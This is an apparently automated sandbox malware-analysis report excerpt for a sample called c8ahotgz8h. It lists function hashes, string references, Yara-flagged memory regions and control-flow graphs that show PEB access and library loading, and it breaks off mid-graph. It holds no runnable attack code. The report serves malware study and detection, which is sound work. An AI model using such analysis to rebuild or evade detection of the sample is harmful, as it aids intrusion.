                                                                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 3446177414-3610490719
                                                                                                                          • Opcode ID: e672b152b09586591e5660eaa5524e085b9eca4aeaf5347d056d18abeac5eec0
                                                                                                                          • Instruction ID: 30807ad5d154dc69b6a21518c715891d93ebc2227297393776059818da11893d
                                                                                                                          • Opcode Fuzzy Hash: e672b152b09586591e5660eaa5524e085b9eca4aeaf5347d056d18abeac5eec0
                                                                                                                          • Instruction Fuzzy Hash: 8691E975604791AFC317CB24C950B2AB79ABF84600F144B5EFA819FA81DB34EC85CF96
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • LdrpCheckModule, xrefs: 1EA59F24
                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 1EA59F1C
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1EA59F2E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-161242083
                                                                                                                          • Opcode ID: 2a10b0dc8d4b90674b27fadffb39a6916b719161f38e8ae8c83c08bbc1a5ee82
                                                                                                                          • Instruction ID: 991a9d7198f5c34f2f4537b7b294c0498fc562d99b9682551422e8a74e867182
                                                                                                                          • Opcode Fuzzy Hash: 2a10b0dc8d4b90674b27fadffb39a6916b719161f38e8ae8c83c08bbc1a5ee82
                                                                                                                          • Instruction Fuzzy Hash: 3571BF75A002559FCB04DF68C990AAEB7F5EF84308F18866DE805EF754E734AD42CB58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 3446177414-2283098728
                                                                                                                          • Opcode ID: 4358922a2668c61be6d06ae23e179259c0bcbd27403af1c70bf2845e627bdff1
                                                                                                                          • Instruction ID: 62c0cc6e3b3398e910bf3adc7ef2c5691eacbbc55ddd8a82f8c9604f3a884fa7
                                                                                                                          • Opcode Fuzzy Hash: 4358922a2668c61be6d06ae23e179259c0bcbd27403af1c70bf2845e627bdff1
                                                                                                                          • Instruction Fuzzy Hash: 2F510335A103429FD714DF38CD80B6A77A6BF88714F180B2DE4529F695E730AC45CB9A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 1EA680E9
                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 1EA680E2
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1EA680F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-1783798831
                                                                                                                          • Opcode ID: b8648fac234a31ff2c598abc01a399f26289e2cc08a71d984185a96c0ea02edd
                                                                                                                          • Instruction ID: 0e0ba420e59b19c9d1466a680fc6b3d556e5e7444392789fef761149abbb8d6f
                                                                                                                          • Opcode Fuzzy Hash: b8648fac234a31ff2c598abc01a399f26289e2cc08a71d984185a96c0ea02edd
                                                                                                                          • Instruction Fuzzy Hash: 1D41E4B5510391ABC724DB68DD80B5B77E9AF84750F005FAAF948AB250EB34EC01CB99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1EA74508
                                                                                                                          • LdrpCheckRedirection, xrefs: 1EA7450F
                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 1EA74519
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                          • API String ID: 3446177414-3154609507
                                                                                                                          • Opcode ID: 0a807c1bfce1dc989d53771283cc318263d81619c72f718d5f1399da38cb152e
                                                                                                                          • Instruction ID: e2f30f17848e077be4e84c4bdb1b50c072fab23602cc5c18c34ad93932fcf682
                                                                                                                          • Opcode Fuzzy Hash: 0a807c1bfce1dc989d53771283cc318263d81619c72f718d5f1399da38cb152e
                                                                                                                          • Instruction Fuzzy Hash: DA41F332E146219FCB10CF59C940A56B7E7AF88650F060B6DED88EB355D732EC80DB99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Wow64 Emulation Layer
                                                                                                                          • API String ID: 3446177414-921169906
                                                                                                                          • Opcode ID: 27b60c312d7934ab0b762df0d23ffd8ce09196044395383c305a95c07572f43b
                                                                                                                          • Instruction ID: 0e7c73413c10e5817109900ba7496af81462937e4a12bb0e641f47d7fdf95d95
                                                                                                                          • Opcode Fuzzy Hash: 27b60c312d7934ab0b762df0d23ffd8ce09196044395383c305a95c07572f43b
                                                                                                                          • Instruction Fuzzy Hash: AB212EB590025DBFAB059AA5CE84EFF7F7DEF44299B040658FA01A7100D731EE01DB69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f4e6b3d2aeb963b103aeb0b5927edb34871b238fa00e5f1622160195889f192b
                                                                                                                          • Instruction ID: 5a386ad6cc14de2cd0fde775477d6a8be0dc857acfd2da6158e960eb078fde71
                                                                                                                          • Opcode Fuzzy Hash: f4e6b3d2aeb963b103aeb0b5927edb34871b238fa00e5f1622160195889f192b
                                                                                                                          • Instruction Fuzzy Hash: E9E10779D00688DFCB24CFA9D980A9DBBF5FF58310F24462AE546AB364D731A881CF14
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3446177414-0
                                                                                                                          • Opcode ID: 0624e124d6a7a7c4340a4b1d75eb3d7a8f8f0dbe3bafeffd42c80c22d40c2cd6
                                                                                                                          • Instruction ID: 2f1b4ec35a791c54380208a1086e1ef34206ca72616c9bd0d8d4136da8ee895b
                                                                                                                          • Opcode Fuzzy Hash: 0624e124d6a7a7c4340a4b1d75eb3d7a8f8f0dbe3bafeffd42c80c22d40c2cd6
                                                                                                                          • Instruction Fuzzy Hash: 13712575E00229DFDF04CFA9C984BDDBBB5BF49314F14916AEA05BB244D734AA01CB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3446177414-0
                                                                                                                          • Opcode ID: a2860afcca81daec0ffc3c04db429e4601b7875975c6caea96d35f0f2b84d019
                                                                                                                          • Instruction ID: 4c65b14d41bd8e84e952d6fcf99649886d982f25dae6b63d9976b3375284fa56
                                                                                                                          • Opcode Fuzzy Hash: a2860afcca81daec0ffc3c04db429e4601b7875975c6caea96d35f0f2b84d019
                                                                                                                          • Instruction Fuzzy Hash: 79516B35710A12DFDB08CE19C8B4A29B7E2FB89350B25466DD90BDB724DB71ED41CB88
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3446177414-0
                                                                                                                          • Opcode ID: 1e895ab484ebb2f19be71a23d60ea824cfb86a214b47371ed0f7a96b83626c2b
                                                                                                                          • Instruction ID: ac3823031ace5bf41ae9b31dd17e8308863b93f83a7a03371cca65d9ab5817bc
                                                                                                                          • Opcode Fuzzy Hash: 1e895ab484ebb2f19be71a23d60ea824cfb86a214b47371ed0f7a96b83626c2b
                                                                                                                          • Instruction Fuzzy Hash: 8C5145B5E102189FDF08CF9AC844ADDBBF6BF49314F15822AE915BB250E7349A41CF58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4281723722-0
                                                                                                                          • Opcode ID: 6db64be77c2c6baa89e1bb799d0ecd717660a7b70d6ae1b1530a8fc818e57341
                                                                                                                          • Instruction ID: 81aff5bd034c405c078bee165d6bc652650e0f2d4d00d80ef18cdf1738fa2c8c
                                                                                                                          • Opcode Fuzzy Hash: 6db64be77c2c6baa89e1bb799d0ecd717660a7b70d6ae1b1530a8fc818e57341
                                                                                                                          • Instruction Fuzzy Hash: 4F31E475E002689FCB05DFA8D984AAEBBF1BB4C720F14466AE511BB290DB356901CF58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 0-2766056989
                                                                                                                          • Opcode ID: 36372e94b6e8f61053158fccb0c819dd26df4286503022e4d5836da83b7f17cf
                                                                                                                          • Instruction ID: 0d10728260772d43a7caec19baf297e2d20f02a907017f0592b2196e1c8f440d
                                                                                                                          • Opcode Fuzzy Hash: 36372e94b6e8f61053158fccb0c819dd26df4286503022e4d5836da83b7f17cf
                                                                                                                          • Instruction Fuzzy Hash: C9322474D042AADFDB21CF65C984BD9BBB5BF08304F0086E9D449A7281D7B5AE84CF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0$Flst
                                                                                                                          • API String ID: 0-758220159
                                                                                                                          • Opcode ID: e3e3101acf8f884ddb8ff9af428de337590741e0d95f6cd297abf5d858b2ae85
                                                                                                                          • Instruction ID: ae183ecb46e03408f7f2baf3bc3215f201651de08f64ebb54ecb68678c4c27ee
                                                                                                                          • Opcode Fuzzy Hash: e3e3101acf8f884ddb8ff9af428de337590741e0d95f6cd297abf5d858b2ae85
                                                                                                                          • Instruction Fuzzy Hash: C751CBB1E1069A8FCB14CF99C584759FBF6EF44B14F54823AD045AB244E7B09D86CB88
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E9F0586
                                                                                                                          • kLsE, xrefs: 1E9F05FE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                          • API String ID: 3446177414-2547482624
                                                                                                                          • Opcode ID: db116d6639263c21a5f70c0a5c4f53bb334b5a28b622675e4c46bd348eb98589
                                                                                                                          • Instruction ID: 6b60d138400e0d5c696f3fa32564a35c485b47bbc1e2da4a7ab089836f2ca550
                                                                                                                          • Opcode Fuzzy Hash: db116d6639263c21a5f70c0a5c4f53bb334b5a28b622675e4c46bd348eb98589
                                                                                                                          • Instruction Fuzzy Hash: AA51CFB1A10786DFCB14DFA6C4406ABBBFDAF44301F108A3ED59587241E7B4A905CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true
                                                                                                                          • Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: 0$0
                                                                                                                          • API String ID: 3446177414-203156872
                                                                                                                          • Opcode ID: b93f66c5ad677032961d8f1613d4fe5357fcc1ade58c2698c9794cf30c9c841d
                                                                                                                          • Instruction ID: 6559ccb392dd24455fead55d0d762e2c2cf76b0a2896e00d4636c4e63023cf62
                                                                                                                          • Opcode Fuzzy Hash: b93f66c5ad677032961d8f1613d4fe5357fcc1ade58c2698c9794cf30c9c841d
                                                                                                                          • Instruction Fuzzy Hash: 5D419FB56187429FC301CF28D544A1ABBE5BB88318F044A6EF588DB700D331EA45CF96
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
                                                                                                                          • API String ID: 1029625771-3546614695
                                                                                                                          • Opcode ID: a994831db66d78b2093441fe9113e5f143bbfa255ab206bf9932e702806651c5
                                                                                                                          • Instruction ID: d0a24021aa5a83e410dc14346b831975518b4d005ce0386654d94a0d83295bd7
                                                                                                                          • Opcode Fuzzy Hash: a994831db66d78b2093441fe9113e5f143bbfa255ab206bf9932e702806651c5
                                                                                                                          • Instruction Fuzzy Hash: 77B2357160434ADFDF349E38C9A57EA3BA2FF55390F95812EDC8A9B244D3348985CB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 295 5706a2-5706df call 56fcc1 298 56a574-56a80f call 571490 call 56a760 295->298 299 5706e5-57073c 295->299 317 56a815-56a841 298->317 318 56f3ee-56f4b1 298->318 302 570742-57074e 299->302 303 573b58-573bea call 56f0f7 299->303 321 56a847-56a8fa 317->321 322 561320-5734e0 call 5610c0 call 560561 317->322 324 56f4e4-56f4e9 LoadLibraryA 318->324 325 56f4b3-56f4e1 call 56fcc1 call 56f542 318->325 330 56a900-56aa86 call 56f3ca call 572acd 321->330 331 57374d-573755 321->331 351 5734e6-57353b 322->351 352 5736ca-573733 322->352 329 56f533-56f53d call 56f542 324->329 325->324 356 56aa8b-56aac7 330->356 357 56aa86 call 572acd 330->357 337 573756-57378f 331->337 337->337 338 573791-5737e0 337->338 351->352 358 573541-573545 351->358 359 56bbfe-56bd48 call 572acd * 3 356->359 360 56aacd-56afd9 call 56f3ee call 572acd call 56bd4b call 56f313 call 572acd 356->360 357->356 358->352 362 57354b-57354f 358->362 359->318 360->359 401 56afdf-56b089 360->401 362->352 365 573555-573559 362->365 365->352 368 57355f-573563 365->368 368->352 372 573569-57356d 368->372 372->352 375 573573-573581 372->375 375->352 378 573587-5735e8 375->378 384 5735e9-5735fd 378->384 386 573672-573689 384->386 387 5735ff-573603 384->387 386->322 390 57368f-5736b2 386->390 387->352 391 573609-573615 387->391 391->322 392 57361b-573669 391->392 392->384 401->318 403 56b08f-56b1e5 call 572acd 401->403 403->322 408 56b1eb-56b20b 403->408 408->359 409 56b211-56b3f2 call 56b2fb 408->409 415 56138e-561464 call 5737e8 409->415 416 56b3f8-56b554 call 572acd 409->416 426 561466-561497 415->426 427 5614dd-561502 415->427 416->359 425 56b55a-56b597 416->425 425->359 430 56b59d-56b604 425->430 426->298 428 561517-561518 427->428 429 561572-561578 427->429 428->429 431 561579-561594 429->431 434 56b606-56b63b 430->434 435 56b641-56b64a 430->435 431->428 433 561596-5615a6 431->433 436 5615b6-5615b9 433->436 437 5615a9-5615b4 433->437 434->359 434->435 435->298 438 56b650-56b66e 435->438 436->431 439 5615bb-5715f9 call 56f3ee * 2 call 5737e8 GetPEB call 5723e2 436->439 437->436 438->359 440 56b674-56b68f 438->440 463 571df1-571e3a 439->463 464 5715ff-5716a1 439->464 440->298 441 56b695-56b8b7 call 56f944 440->441 441->359 453 56b8bd-56b9ea call 57374d 441->453 453->359 467 56b9f0-56baba call 572acd 453->467 464->415 469 5716a7-571838 464->469 467->359 476 56bac0-56bb82 call 572acd 467->476 477 57183c-57184d 469->477 476->359 488 56bb84-56bbde 476->488 479 571853-571863 477->479 480 571e40-571e54 477->480 479->477 483 571865-571892 479->483 482 571e58-571e6d 480->482 485 571e73-571eac 482->485 486 572172-572187 482->486 483->477 487 571894-5718aa 483->487 485->482 489 571eae-571ec5 485->489 486->415 492 57218d-57218e 486->492 487->477 490 5718ac-571920 487->490 488->331 496 56bbe4-56bbfd call 572acd 488->496 489->482 494 571ec7-571f29 489->494 497 571922-57199c 490->497 493 572192-5721a1 492->493 499 5721a7-572219 493->499 500 5723b6-5723dd call 5723e2 493->500 494->482 506 571f2f-571f46 494->506 508 5719a2-5719e7 497->508 509 571a39-571a4c 497->509 499->415 510 57221f-57222a 499->510 506->415 507 571f4c-571fb8 506->507 516 571fbd-571fd1 507->516 513 571a69-571a79 508->513 509->513 514 571a4e-571a68 509->514 510->493 515 572230-572244 510->515 518 571a7f-571a96 513->518 519 571c2d-571c44 513->519 514->513 515->493 517 57224a-57227e 515->517 522 5720a7-5720e0 516->522 523 571fd7-571ff1 516->523 517->493 524 572284-5722f0 517->524 518->519 525 571a9c-571b0e 518->525 520 571d64-571da8 519->520 521 571c4a-571cd0 519->521 520->497 529 571dae-571dec call 5723e2 520->529 521->520 533 571cd6-571d61 521->533 522->516 532 5720e6-57216c call 5723e2 522->532 527 571ff3-57200a 523->527 528 57201c-572084 523->528 537 5722f5-57230e 524->537 538 571b0f-571b3f 525->538 527->322 534 572010-57201a 527->534 528->522 529->463 533->520 534->528 541 572088-5720a6 534->541 542 572310-57237a 537->542 543 57237b-5723ae 537->543 538->538 544 571b41-571bdb 538->544 541->522 542->543 543->537 548 5723b4 543->548 544->538 551 571be1-571c20 544->551 548->500 551->538 552 571c26-571c2a 551->552 552->519
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ";Jm$H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 0-2571250244
                                                                                                                          • Opcode ID: f9d2e81ba44d5965e827736770de22e66262a531534cc237cc2832ee5ebeaf67
                                                                                                                          • Instruction ID: de7bc562adc1e8c29e232d2a8b7260b26451281c24de198095c5d92c0124658d
                                                                                                                          • Opcode Fuzzy Hash: f9d2e81ba44d5965e827736770de22e66262a531534cc237cc2832ee5ebeaf67
                                                                                                                          • Instruction Fuzzy Hash: 20A2447160434A9FDF349E38CDA57DA7BA2FF55350F59822EDC8A8B250D3358986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 553 56ce0c-56ceed call 56f3ee * 5 565 56cef3-56cfe3 553->565 567 57374d-573755 565->567 568 56cfe9-56d064 565->568 570 573756-57378f 567->570 572 56138e-561464 call 5737e8 568->572 573 56d06a-56d075 call 572acd 568->573 570->570 571 573791-5737e0 570->571 587 561466-561497 572->587 588 5614dd-561502 572->588 579 56d5fe-56d6a8 call 572acd * 2 573->579 580 56d07b-56d187 call 572acd 573->580 579->565 612 56f3ee-56f4b1 579->612 580->579 596 56d18d-56d1d1 580->596 593 56a574-56a80f call 571490 call 56a760 587->593 589 561517-561518 588->589 590 561572-561578 588->590 589->590 594 561579-561594 590->594 593->612 629 56a815-56a841 593->629 594->589 598 561596-5615a6 594->598 596->593 605 56d1d7-56d32d call 56d1f6 call 572acd 596->605 603 5615b6-5615b9 598->603 604 5615a9-5615b4 598->604 603->594 607 5615bb-5715f9 call 56f3ee * 2 call 5737e8 GetPEB call 5723e2 603->607 604->603 605->579 632 56d333-56d392 605->632 665 571df1-571e3a 607->665 666 5715ff-5716a1 607->666 618 56f4e4-56f53d LoadLibraryA call 56f542 612->618 619 56f4b3-56f4e1 call 56fcc1 call 56f542 612->619 619->618 634 56a847-56a8fa 629->634 635 561320-5734e0 call 5610c0 call 560561 629->635 632->612 643 56d398-56d3f8 632->643 634->567 644 56a900-56aa86 call 56f3ca call 572acd 634->644 669 5734e6-57353b 635->669 670 5736ca-573733 635->670 648 56d3fb-56d480 643->648 678 56aa8b-56aac7 644->678 679 56aa86 call 572acd 644->679 657 56d482-56d488 648->657 658 56d48a-56d54b call 572acd 648->658 657->658 658->579 680 56d551-56d55e 658->680 666->572 677 5716a7-571838 666->677 669->670 683 573541-573545 669->683 700 57183c-57184d 677->700 685 56bbfe-56bd48 call 572acd * 3 678->685 686 56aacd-56afd9 call 56f3ee call 572acd call 56bd4b call 56f313 call 572acd 678->686 679->678 681 56d576-56d5f7 call 572acd * 2 680->681 682 56d560-56d56f 680->682 682->648 683->670 689 57354b-57354f 683->689 685->612 686->685 799 56afdf-56b089 686->799 689->670 694 573555-573559 689->694 694->670 699 57355f-573563 694->699 699->670 705 573569-57356d 699->705 706 571853-571863 700->706 707 571e40-571e54 700->707 705->670 711 573573-573581 705->711 706->700 713 571865-571892 706->713 712 571e58-571e6d 707->712 711->670 716 573587-5735e8 711->716 717 571e73-571eac 712->717 718 572172-572187 712->718 713->700 719 571894-5718aa 713->719 729 5735e9-5735fd 716->729 717->712 723 571eae-571ec5 717->723 718->572 725 57218d-57218e 718->725 719->700 724 5718ac-571920 719->724 723->712 730 571ec7-571f29 723->730 732 571922-57199c 724->732 726 572192-5721a1 725->726 733 5721a7-572219 726->733 734 5723b6-5723dd call 5723e2 726->734 736 573672-573689 729->736 737 5735ff-573603 729->737 730->712 746 571f2f-571f46 730->746 749 5719a2-5719e7 732->749 750 571a39-571a4c 732->750 733->572 751 57221f-57222a 733->751 736->635 744 57368f-5736b2 736->744 737->670 745 573609-573615 737->745 745->635 747 57361b-573669 